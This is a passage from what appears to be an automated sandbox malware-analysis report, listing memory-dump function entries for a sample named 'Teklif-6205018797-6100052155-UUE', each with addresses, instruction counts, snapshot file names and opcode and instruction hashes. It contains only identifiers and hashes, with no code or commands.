                                                          • Opcode Fuzzy Hash: 432c1dc090e2d0ad41fe8715333f3d8f702969acb1f3c38e32ed50b4f0f9e2ca
                                                          • Instruction Fuzzy Hash: 53F0E73180421AEBCF11EF99D8009EEBB75FF89320F04D619E95827251D736A5A6DB90
                                                          Function 05965BF8 Relevance: .0, Instructions: 32COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2231818294.0000000005960000.00000040.00000800.00020000.00000000.sdmp, Offset: 05960000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5960000_Teklif-6205018797-6100052155-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 969fc3f73706d85b7290e69a93854613c2a3d2e21123c2b0da763c655df286fa
                                                          • Instruction ID: dc165dc1a29b16a1d7ea70ff20c3ba41d877c70231cac7a4e4db178159c5be69
                                                          • Opcode Fuzzy Hash: 969fc3f73706d85b7290e69a93854613c2a3d2e21123c2b0da763c655df286fa
                                                          • Instruction Fuzzy Hash: CE019AB4A01218CFDB64DF28D885B99B7F2BB09300F4480DAE54DE7246DB709E848F00
                                                          Function 0593CC98 Relevance: .0, Instructions: 32COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2231654792.0000000005930000.00000040.00000800.00020000.00000000.sdmp, Offset: 05930000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5930000_Teklif-6205018797-6100052155-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 4d348a27f653a7e2819b1e64c5eee54ee11c652ccf48e162d16660c27170bb2c
                                                          • Instruction ID: 91039fc9f02e9c10da1652de988b28cdcb519c0d7b7fc0c3d6efbadb170e3890
                                                          • Opcode Fuzzy Hash: 4d348a27f653a7e2819b1e64c5eee54ee11c652ccf48e162d16660c27170bb2c
                                                          • Instruction Fuzzy Hash: D2F05E3A3502009FC714DF29D454E2AB7AAEFC8721B108469F9068B760CA71EC42CB90
                                                          Function 05933C6A Relevance: .0, Instructions: 32COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2231654792.0000000005930000.00000040.00000800.00020000.00000000.sdmp, Offset: 05930000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5930000_Teklif-6205018797-6100052155-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: a4f6d6ca8bce04b276afda0cc93179d48ce86d247cee830d00e909ad485aaad2
                                                          • Instruction ID: 77ec1d37e3751a56e5a6d19d97f3fd2bf9dbb29decb3019001915c9157ecc3a2
                                                          • Opcode Fuzzy Hash: a4f6d6ca8bce04b276afda0cc93179d48ce86d247cee830d00e909ad485aaad2
                                                          • Instruction Fuzzy Hash: 3BF09A32A40219EBDB08DB91CD06ADEBBF2FB89201F244829D401B73A4DB755D05CAE0
                                                          Function 05932031 Relevance: .0, Instructions: 32COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2231654792.0000000005930000.00000040.00000800.00020000.00000000.sdmp, Offset: 05930000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5930000_Teklif-6205018797-6100052155-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: e8b096e036bf75b87b6cfc53723fcf7ce8dff7eb37d3d4665f5e8a46409639f1
                                                          • Instruction ID: b7776945f46b77ac7b6d327e1226ccd0827b1cad9f292542b37f32362f0068d8
                                                          • Opcode Fuzzy Hash: e8b096e036bf75b87b6cfc53723fcf7ce8dff7eb37d3d4665f5e8a46409639f1
                                                          • Instruction Fuzzy Hash: C8F08231A08218AFDB09DBA9D4497CD7FB6EB84720F18C1A5D006D7681DB795A86CB84
                                                          Function 0585E214 Relevance: .0, Instructions: 30COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2231078076.0000000005850000.00000040.00000800.00020000.00000000.sdmp, Offset: 05850000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5850000_Teklif-6205018797-6100052155-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: e8cf01a7f2843095a9d1e0cd403e8c7e6f44dfbdfec59235fe8580babd6b2e68
                                                          • Instruction ID: 128d6de6e9604a4ed18e7a38bc72bbf42a22a233f0772e810052de83950aa470
                                                          • Opcode Fuzzy Hash: e8cf01a7f2843095a9d1e0cd403e8c7e6f44dfbdfec59235fe8580babd6b2e68
                                                          • Instruction Fuzzy Hash: E3011434911218CFDB44DF98D899B9CBBB2FB49325F1048A9E809AB341CB755E84CF11
                                                          Function 0596D370 Relevance: .0, Instructions: 29COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2231818294.0000000005960000.00000040.00000800.00020000.00000000.sdmp, Offset: 05960000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5960000_Teklif-6205018797-6100052155-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 8fd3d0ea8ce480929fd39bca2b60980745c3420e764770a26aa025b3258dde15
                                                          • Instruction ID: 79a6279a7e5288202cb737c17c89e63cd34a11da79e6e3427163056d3e7dcb36
                                                          • Opcode Fuzzy Hash: 8fd3d0ea8ce480929fd39bca2b60980745c3420e764770a26aa025b3258dde15
                                                          • Instruction Fuzzy Hash: C3F01C39D04208EFCB45CF98D851BADBBB5EB48314F14C1AAEC6857351D6329A62EF90
                                                          Function 0596BA56 Relevance: .0, Instructions: 29COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2231818294.0000000005960000.00000040.00000800.00020000.00000000.sdmp, Offset: 05960000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5960000_Teklif-6205018797-6100052155-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 02f3a1ab96bab58a8059cc4b355a9b0d4b4ef6342130f019c81366d50dfe9c62
                                                          • Instruction ID: 9e9490921582e058e349b8123bb114798d622c2131e6af5308990fd24ca634f2
                                                          • Opcode Fuzzy Hash: 02f3a1ab96bab58a8059cc4b355a9b0d4b4ef6342130f019c81366d50dfe9c62
                                                          • Instruction Fuzzy Hash: 57019274A05258CFDB60CF18C984F99B7F6EB45304F2484EAD40EAB241DB729AC9CF02
                                                          Function 0593A791 Relevance: .0, Instructions: 29COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2231654792.0000000005930000.00000040.00000800.00020000.00000000.sdmp, Offset: 05930000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5930000_Teklif-6205018797-6100052155-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: b2bde0dcb596045fc2af7a4a139dc421003f0167cf93ea22320f9787cd3e6b72
                                                          • Instruction ID: e97975583e9b3184f8ef770b238b25dd514b1951650561b4c2f924ca61771932
                                                          • Opcode Fuzzy Hash: b2bde0dcb596045fc2af7a4a139dc421003f0167cf93ea22320f9787cd3e6b72
                                                          • Instruction Fuzzy Hash: 78E0921265C7804FD742922CAC0768A3FA0EB4A110B0A95A6A487CF593E124D80A8BA2
                                                          Function 0585D101 Relevance: .0, Instructions: 29COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2231078076.0000000005850000.00000040.00000800.00020000.00000000.sdmp, Offset: 05850000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5850000_Teklif-6205018797-6100052155-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: db58b90d134f7e54b183591cfa2481a85de3d86c37f04fccaa6f590a23c97980
                                                          • Instruction ID: b87738f61cdc625d9b9aadfdce09396b474a4f53160df11137af464e72130a1e
                                                          • Opcode Fuzzy Hash: db58b90d134f7e54b183591cfa2481a85de3d86c37f04fccaa6f590a23c97980
                                                          • Instruction Fuzzy Hash: 9DF0A770D5A748CFCB51EBB88D495A8BFB0EB06261F1012A6CD45D3252F2310E45DB42
                                                          Function 0585D558 Relevance: .0, Instructions: 29COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2231078076.0000000005850000.00000040.00000800.00020000.00000000.sdmp, Offset: 05850000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5850000_Teklif-6205018797-6100052155-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 70d5cb9c7bc10bdd7ac0795b5ab3bd02a2db30eb5114452f753941bd37266781
                                                          • Instruction ID: a329d727dbdc96bd7f132f4e9de7427fa9233307cf057062a763c280c496cb17
                                                          • Opcode Fuzzy Hash: 70d5cb9c7bc10bdd7ac0795b5ab3bd02a2db30eb5114452f753941bd37266781
                                                          • Instruction Fuzzy Hash: 36F05E7481A248AFCB42CFA4C8449A87FB1AF1A324F5491D9EC4597372C2714E55EB52
                                                          Function 05854C40 Relevance: .0, Instructions: 29COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2231078076.0000000005850000.00000040.00000800.00020000.00000000.sdmp, Offset: 05850000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5850000_Teklif-6205018797-6100052155-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 81ef856cb2a1bd817ea6c8763df322f0f5ff12bcef100b6201ce3e5385d5cda2
                                                          • Instruction ID: 6f975e0342757592011ab288d894b73b767f9ff0e3521c2fcc1628d579297596
                                                          • Opcode Fuzzy Hash: 81ef856cb2a1bd817ea6c8763df322f0f5ff12bcef100b6201ce3e5385d5cda2
                                                          • Instruction Fuzzy Hash: 6FF082B4C09208AFCB45CFA4D8405ACBFB0EB85310F14C196DC4497393C6324E52EF45
                                                          Function 0585A076 Relevance: .0, Instructions: 29COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2231078076.0000000005850000.00000040.00000800.00020000.00000000.sdmp, Offset: 05850000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5850000_Teklif-6205018797-6100052155-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: d4ae5faf9b8c9d4227438638257546fb0df67744e39f3c10b907f57e6541ad92
                                                          • Instruction ID: ba41d13362eae9a700b24ac454fe348ed9f5079075371673437a0eb3efb5c45d
                                                          • Opcode Fuzzy Hash: d4ae5faf9b8c9d4227438638257546fb0df67744e39f3c10b907f57e6541ad92
                                                          • Instruction Fuzzy Hash: 1B0140B4D412698FDBA4CF29D894B9DBBB1BB48305F5084EAD90AB3240DB305E85CF09
                                                          Function 0585D368 Relevance: .0, Instructions: 29COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2231078076.0000000005850000.00000040.00000800.00020000.00000000.sdmp, Offset: 05850000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5850000_Teklif-6205018797-6100052155-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 743e43a23731d221fe6cc383db092a35f9ed17e095dda44ed1250daae6f4c3d1
                                                          • Instruction ID: e00ba238718a9be142bbab108863e066dcf60b80cbe1695a5296b0616ae53763
                                                          • Opcode Fuzzy Hash: 743e43a23731d221fe6cc383db092a35f9ed17e095dda44ed1250daae6f4c3d1
                                                          • Instruction Fuzzy Hash: 95F067B8C1A248AFCB11CFB8C4006ECBFB1AB16210F0080AACC0492252E2314A02EF11
                                                          Function 05967C48 Relevance: .0, Instructions: 28COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2231818294.0000000005960000.00000040.00000800.00020000.00000000.sdmp, Offset: 05960000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5960000_Teklif-6205018797-6100052155-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: f9c5cacfa619b777c6d7cc78b5f1cd447d0f6706201ae84713b00a0ce0cb4c49
                                                          • Instruction ID: 4d341572f92255e26fb9070efe73db541165d6cc305cc70a3670369692ff9d4e
                                                          • Opcode Fuzzy Hash: f9c5cacfa619b777c6d7cc78b5f1cd447d0f6706201ae84713b00a0ce0cb4c49
                                                          • Instruction Fuzzy Hash: F2F015B4D04208EFCB84DFA8D85279DBBF4EB88304F14C1A99808D3341DA359A42DF41
                                                          Function 0596DE68 Relevance: .0, Instructions: 28COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2231818294.0000000005960000.00000040.00000800.00020000.00000000.sdmp, Offset: 05960000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5960000_Teklif-6205018797-6100052155-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: a93b8586ae25ef9894d513321b501c095300c8228c653e893b1b14d6d8a6cde5
                                                          • Instruction ID: 16de7ee1c372b975fca1faef74bef008c5608680b643ec004bebfd7563613e92
                                                          • Opcode Fuzzy Hash: a93b8586ae25ef9894d513321b501c095300c8228c653e893b1b14d6d8a6cde5
                                                          • Instruction Fuzzy Hash: E7F0A0B4908208AFCB40CF98C8016ECBBB5EB58300F04C0A9DC1457341C631CA42DB40
                                                          Function 0596B228 Relevance: .0, Instructions: 28COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2231818294.0000000005960000.00000040.00000800.00020000.00000000.sdmp, Offset: 05960000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5960000_Teklif-6205018797-6100052155-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: e311ee881a0bbc43ad49766d616b391bebc547684035b1bb832ce17164c5007b
                                                          • Instruction ID: a73eea3960920147fb9c313558d510d4badfecb998a5f81560e6553ff8e9b9be
                                                          • Opcode Fuzzy Hash: e311ee881a0bbc43ad49766d616b391bebc547684035b1bb832ce17164c5007b
                                                          • Instruction Fuzzy Hash: 52F05835408108EBCF01CFA4D885AEDBFB2EB99310F14C0A9ED4453251C7329966EB51
                                                          Function 05C72149 Relevance: .0, Instructions: 28COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2232891361.0000000005C70000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C70000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5c70000_Teklif-6205018797-6100052155-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 218a8be321cb1ec0a61dd1e611b18ef81651da72cf10c0e537430f532bbd34fc
                                                          • Instruction ID: 913941734f9e152f2fc848bb92b82e6384a0c37ecc062769003cce5a3be4378d
                                                          • Opcode Fuzzy Hash: 218a8be321cb1ec0a61dd1e611b18ef81651da72cf10c0e537430f532bbd34fc
                                                          • Instruction Fuzzy Hash: 03013170A0021D8FCB64EF54C858BAAB7B6FB49300F1085E5E409A7746CB385E89CF51
                                                          Function 059687E8 Relevance: .0, Instructions: 27COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2231818294.0000000005960000.00000040.00000800.00020000.00000000.sdmp, Offset: 05960000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5960000_Teklif-6205018797-6100052155-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: bd88031e0aaa33764d139365602867b8f65e6f358fbd3b702e34be6c5e1efe65
                                                          • Instruction ID: 4292b687adeda147805011fa318b026eb2a1240eaab1b18ca2fb3069e7eac336
                                                          • Opcode Fuzzy Hash: bd88031e0aaa33764d139365602867b8f65e6f358fbd3b702e34be6c5e1efe65
                                                          • Instruction Fuzzy Hash: A0F03970D08208EFCF45EFA8D44169CBBF5EB88301F00D5BAE858A7391DA399A55EF41
                                                          Function 0596B91B Relevance: .0, Instructions: 27COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2231818294.0000000005960000.00000040.00000800.00020000.00000000.sdmp, Offset: 05960000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5960000_Teklif-6205018797-6100052155-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: d93f1a40718441c563fed3f94fee0dcaa6dac2453996bb055b394d986fbc7a0c
                                                          • Instruction ID: 3ff2f4df796e17e3922722732bbc3d2b13c59751b6ba67f0a5f9f98978d72efb
                                                          • Opcode Fuzzy Hash: d93f1a40718441c563fed3f94fee0dcaa6dac2453996bb055b394d986fbc7a0c
                                                          • Instruction Fuzzy Hash: 6A019D74A012689FCBA4DF64DC94BDCBBB2BB49300F1055DAE909B72A0DB706E81CF40
                                                          Function 05964A28 Relevance: .0, Instructions: 27COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2231818294.0000000005960000.00000040.00000800.00020000.00000000.sdmp, Offset: 05960000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5960000_Teklif-6205018797-6100052155-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: ccdc929852b9546879d16fbae3eee1bfc183c303affd4814efd0a1404f4e4652
                                                          • Instruction ID: 79627ffe08744461b3d42f972199bf1760a92828a215bca23cc85119f3377c1d
                                                          • Opcode Fuzzy Hash: ccdc929852b9546879d16fbae3eee1bfc183c303affd4814efd0a1404f4e4652
                                                          • Instruction Fuzzy Hash: E7E09274549108ABCB44DF94DE456EDBBB9EB44300F14A0AC9C0C57381C632AA0AEA85
                                                          Function 05939138 Relevance: .0, Instructions: 27COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2231654792.0000000005930000.00000040.00000800.00020000.00000000.sdmp, Offset: 05930000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5930000_Teklif-6205018797-6100052155-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: c02b08388c3dd622a8b14c00afb48930252c4d0e5f991814ff3aa344260c5797
                                                          • Instruction ID: bb39af2ee826c4a572e299a0d0b5542a1f39f9071cd5c34877f64ed63fb74f32
                                                          • Opcode Fuzzy Hash: c02b08388c3dd622a8b14c00afb48930252c4d0e5f991814ff3aa344260c5797
                                                          • Instruction Fuzzy Hash: 49F0A0322087414FC7069A39F984C4AFFAAEFC52107158976E04A8722ADA789D49C790
                                                          Function 058524A0 Relevance: .0, Instructions: 27COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2231078076.0000000005850000.00000040.00000800.00020000.00000000.sdmp, Offset: 05850000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5850000_Teklif-6205018797-6100052155-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 1920b0eb71517f296947ba306deabb9012de9f53696d00aafa2db70aa078c1d5
                                                          • Instruction ID: a11c48374e6ca4cb47a0650793010abb2a744d9e4148745d4088399fbe39c36e
                                                          • Opcode Fuzzy Hash: 1920b0eb71517f296947ba306deabb9012de9f53696d00aafa2db70aa078c1d5
                                                          • Instruction Fuzzy Hash: 9BF01C74D08248EFCB85DFA9C840AADBFF9AB48310F14C09AAC59D3341D6359A51EF50
                                                          Function 05963FA0 Relevance: .0, Instructions: 26COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2231818294.0000000005960000.00000040.00000800.00020000.00000000.sdmp, Offset: 05960000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5960000_Teklif-6205018797-6100052155-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 44e1e7ff265a021cb91982eef7dcba3f05042f7e9bfc67a3d366529e97e3a850
                                                          • Instruction ID: 2794899b477de6aef20fddbf9a829305629e55eb6dda39a1d44bbeba0062ea40
                                                          • Opcode Fuzzy Hash: 44e1e7ff265a021cb91982eef7dcba3f05042f7e9bfc67a3d366529e97e3a850
                                                          • Instruction Fuzzy Hash: 58E092346881199FC705DE68DC027ADB7B5EB80300F14C4AD9C0497382CB31EA0AEB85
                                                          Function 05960870 Relevance: .0, Instructions: 26COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2231818294.0000000005960000.00000040.00000800.00020000.00000000.sdmp, Offset: 05960000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5960000_Teklif-6205018797-6100052155-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: fbcd1b70f07da59da288d0c7b7594d5462961cc1699493370a2c4b91791c78b0
                                                          • Instruction ID: c607ef7ef29feed6726e0a72f64a38307a270eaadbbdc76f66ed19fcb259fcfc
                                                          • Opcode Fuzzy Hash: fbcd1b70f07da59da288d0c7b7594d5462961cc1699493370a2c4b91791c78b0
                                                          • Instruction Fuzzy Hash: 71E092349181089BCB15DFA8DC8A7ECBFB1EB46315F1491ADC80457382C7339A0ADB82
                                                          Function 0596CACD Relevance: .0, Instructions: 26COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2231818294.0000000005960000.00000040.00000800.00020000.00000000.sdmp, Offset: 05960000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5960000_Teklif-6205018797-6100052155-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: c6aa013ca6e92282e945b1b447e4b7db3441a263209ae7281b12af0975cec817
                                                          • Instruction ID: ff4f0ae791b7e7d02968947c5ff843d82bcbf92f33d6eadf645544900476faf8
                                                          • Opcode Fuzzy Hash: c6aa013ca6e92282e945b1b447e4b7db3441a263209ae7281b12af0975cec817
                                                          • Instruction Fuzzy Hash: 8CF0B27690421DAFDB20CF50CD81FD9B7B9BB08304F1080D6A649AB281D671AB89CF10
                                                          Function 0596AA58 Relevance: .0, Instructions: 26COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2231818294.0000000005960000.00000040.00000800.00020000.00000000.sdmp, Offset: 05960000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5960000_Teklif-6205018797-6100052155-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: e900d3b44020ebc46dde932f6973fb79c97947ece6008bcec80c6bbbb036db39
                                                          • Instruction ID: 65565843da44ed737f70f16ec2812857b019acd9e6fc681e04b8ddd64ee92033
                                                          • Opcode Fuzzy Hash: e900d3b44020ebc46dde932f6973fb79c97947ece6008bcec80c6bbbb036db39
                                                          • Instruction Fuzzy Hash: 2AF01C39508208FFCB05CF94DD40AADBB76FF49311F14859AEC1527251C7329A65EB51
                                                          Function 05853FB0 Relevance: .0, Instructions: 26COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2231078076.0000000005850000.00000040.00000800.00020000.00000000.sdmp, Offset: 05850000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5850000_Teklif-6205018797-6100052155-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 80a37eb319f2f47d2b77fe07b1664a0fea5d0de94cb0d08e71009abc3436351b
                                                          • Instruction ID: 91e6c3d46b14e087f9395f1d99a794e8086a10730ae8a17817a05a79d3415233
                                                          • Opcode Fuzzy Hash: 80a37eb319f2f47d2b77fe07b1664a0fea5d0de94cb0d08e71009abc3436351b
                                                          • Instruction Fuzzy Hash: 6DF08C709156089FCB00DF68D588AACBFF0AF09229F140AA8ED05D7361D631CD51CB41
                                                          Function 0585DB77 Relevance: .0, Instructions: 26COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2231078076.0000000005850000.00000040.00000800.00020000.00000000.sdmp, Offset: 05850000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5850000_Teklif-6205018797-6100052155-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: c4bacd6cb363f526c002c825e82ec38e3f789220b04300739c549222a57659f7
                                                          • Instruction ID: d0721272275a642a42dc815464a2e0737d1c81b1a49daca8f8a8e87098148b5f
                                                          • Opcode Fuzzy Hash: c4bacd6cb363f526c002c825e82ec38e3f789220b04300739c549222a57659f7
                                                          • Instruction Fuzzy Hash: AEF0B2749012188FCB44EF98D885B9DBBB2FB49318F5004A9E809A7341CB349E94CF15
                                                          Function 0596B6F2 Relevance: .0, Instructions: 25COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2231818294.0000000005960000.00000040.00000800.00020000.00000000.sdmp, Offset: 05960000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5960000_Teklif-6205018797-6100052155-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: f648300278a8151427a6ac3447b1e9db6f8649303f9e1d4b1aa3f3150b0fc43d
                                                          • Instruction ID: 3e53b3f8ce582dd8d3067a66d67a33707a612fcb799b45d4ae27a6913edfffd6
                                                          • Opcode Fuzzy Hash: f648300278a8151427a6ac3447b1e9db6f8649303f9e1d4b1aa3f3150b0fc43d
                                                          • Instruction Fuzzy Hash: ECF06D74A01268DFDBA4CF54D984BDCBBB2FB09300F1094DAE909B7260DBB15A84CF00
                                                          Function 0596B838 Relevance: .0, Instructions: 25COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2231818294.0000000005960000.00000040.00000800.00020000.00000000.sdmp, Offset: 05960000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5960000_Teklif-6205018797-6100052155-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: d2a2ade1113423a42ebfb8271a77aac625fb06e9f23617faa94e62ad056252be
                                                          • Instruction ID: 1628fabb1d8bd0b80f29f644fc46346abed1c958ab20a5cd712e59bea8c2d1ba
                                                          • Opcode Fuzzy Hash: d2a2ade1113423a42ebfb8271a77aac625fb06e9f23617faa94e62ad056252be
                                                          • Instruction Fuzzy Hash: D8F0E77494521ACFCB20CF14C988BAC77F1FB05305F2445E5D409A6261EB719AC8CF40
                                                          Function 05939148 Relevance: .0, Instructions: 25COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2231654792.0000000005930000.00000040.00000800.00020000.00000000.sdmp, Offset: 05930000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5930000_Teklif-6205018797-6100052155-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 51e44633458cfc0b9c3bff41efe86907d55749d5f0868bb9579b193b8f1fc8bb
                                                          • Instruction ID: dd7c0a8b1894fd147b07871bbd98bf328740d07edccbd490e9b4e8b930b1de20
                                                          • Opcode Fuzzy Hash: 51e44633458cfc0b9c3bff41efe86907d55749d5f0868bb9579b193b8f1fc8bb
                                                          • Instruction Fuzzy Hash: 7DE012313042055BC7149A2AF984C4BFB9EEFC42647148939A10A87229DE75ED49C7D0
                                                          Function 0585E091 Relevance: .0, Instructions: 25COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2231078076.0000000005850000.00000040.00000800.00020000.00000000.sdmp, Offset: 05850000, based on PE: false
                                                          Joe Sandbox IDA Plugin
